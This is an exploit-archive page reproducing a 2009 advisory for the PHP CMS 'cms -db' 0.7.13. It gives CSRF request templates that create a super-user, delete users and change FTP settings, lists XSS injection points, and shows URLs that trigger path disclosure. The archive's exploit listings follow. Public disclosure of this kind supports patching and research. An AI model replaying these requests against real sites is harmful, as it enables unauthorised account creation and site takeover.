Menu

Search for hundreds of thousands of exploits

"cms -db 0.7.13 - Multiple Vulnerabilities"

Author

Exploit author

cp77fk4r

Platform

Exploit platform

php

Release date

Exploit published date

2009-12-25

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# Author: cp77fk4r | Empty0pagE[SHIFT+2]Gmail.com
# Software Link: [http://cms-db.de/download]
# Version: [cms -db <= v0.7.13]
#
#
# [CSRF]
-Add super-user: <POST>
URL:
/cms/admin/newuser.php
#
PARAMS: <POST>
user=[USER_NAME]&pass=[PASSWORD]&repeat=[PASSWORD]&pages=on&files=on&includes=on&template=on&gbook=on&blog=on&stats=on&button=Save
#
-Delete user: <GET&POST>
USR:
http://[SITE_URL]/admin/deluser.php
#
PARAMS: <GET>
user=[USER_ID].php
#
PARAMS: <POST>
user=[USER_ID].php&button=Yes
#
-Set ftp server login: <POST>
URL:
/cms/admin/ftpsettings.php
#
PARAMS: <POST>
ftpserver=localhost&ftpuser=[USERNAME]&ftppw=[PASSWORD]&ftpdir=%2F&button=Save
#
#
# [XSS]
http://[SITE_URL]/admin/index.php?locale=[XSS]
http://[SITE_URL]/blogfeed.php?l=[XSS]
http://[SITE_URL]/admin/users.php?saved=[XSS] <Login required>
#
#
# [Full Path Disclosure]
Fatal errorz:
URL:
http://[SITE_URL]/gb.php
Fatal error: Call to a member function addToHead() on a non-object
in [Full Path] on line 13
#
http://[SITE_URL]/contact.php
Fatal error: Class 'LocalizingClass' not found in [Full
Path]/contact.php on line 3
#
http://[SITE_URL]/blog.php
Fatal error: Class 'LocalizingClass' not found in [Full
Path]/blog.php on line 7
#
Warning:
http://[SITE_URL]/functions_url.inc.php
Warning: include() [function.include]: Unable to access
../data/settings/url.inc.php in [Full Path]/functions_url.inc.php on
line 10
Warning: include(../data/settings/url.inc.php) [function.include]:
failed to open stream: No such file or directory in [Full
Path]/functions_url.inc.php on line 10
Warning: include() [function.include]: Unable to access
../data/settings/url.inc.php in [Full Path]/functions_url.inc.php on
line 10
Warning: include(../data/settings/url.inc.php) [function.include]:
failed to open stream: No such file or directory in [Full
Path]/functions_url.inc.php on line 10
Warning: include() [function.include]: Failed opening
'../data/settings/url.inc.php' for inclusion
(include_path='.:/usr/share/php:/usr/share/pear') in [Full
Path]/functions_url.inc.php on line 10
Warning: file_get_contents() [function.file-get-contents]: Unable
to access ../data/urlindex.txt in [Full Path]/functions_url.inc.php on
line 11
Warning: file_get_contents(../data/urlindex.txt)
[function.file-get-contents]: failed to open stream: No such file or
directory in [Full Path]/functions_url.inc.php on line 11
#
#
# [e0f]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2010-06-22 "SoftComplex PHP Event Calendar 1.5 - Multiple Remote Vulnerabilities" webapps php cp77fk4r
2010-06-22 "PHP Event Calendar 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-06-13 "PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-05-30 "Nginx 0.6.36 - Directory Traversal" remote multiple cp77fk4r
2010-05-18 "phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path" webapps php cp77fk4r
2010-04-13 "Blog System 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-04-12 "Blog System 1.x - Multiple Input Validation Vulnerabilities" webapps php cp77fk4r
2010-04-08 "Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities" remote multiple cp77fk4r
2010-04-08 "miniature java Web server 1.71 - Multiple Vulnerabilities" remote multiple cp77fk4r
2010-04-03 "SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery Vulnerabilities" webapps asp cp77fk4r
2010-04-03 "Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting" remote multiple cp77fk4r
2010-03-27 "Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-02-11 "PHP Captcha Security Images - Denial of Service" dos php cp77fk4r
2010-02-09 "MOJO's IWms 7 - SQL Injection / Cross-Site Scripting" webapps asp cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting" webapps java cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-01-24 "SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection" webapps php cp77fk4r
2010-01-21 "SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery" webapps windows cp77fk4r
2009-12-25 "cms -db 0.7.13 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-22 "DeluxeBB 1.3 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-21 "social Web CMS Beta 2 - Multiple Vulnerabilities" webapps php cp77fk4r
2007-12-17 "MOJO IWms 7 - 'default.asp' Cookie Manipulation" webapps asp cp77fk4r
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.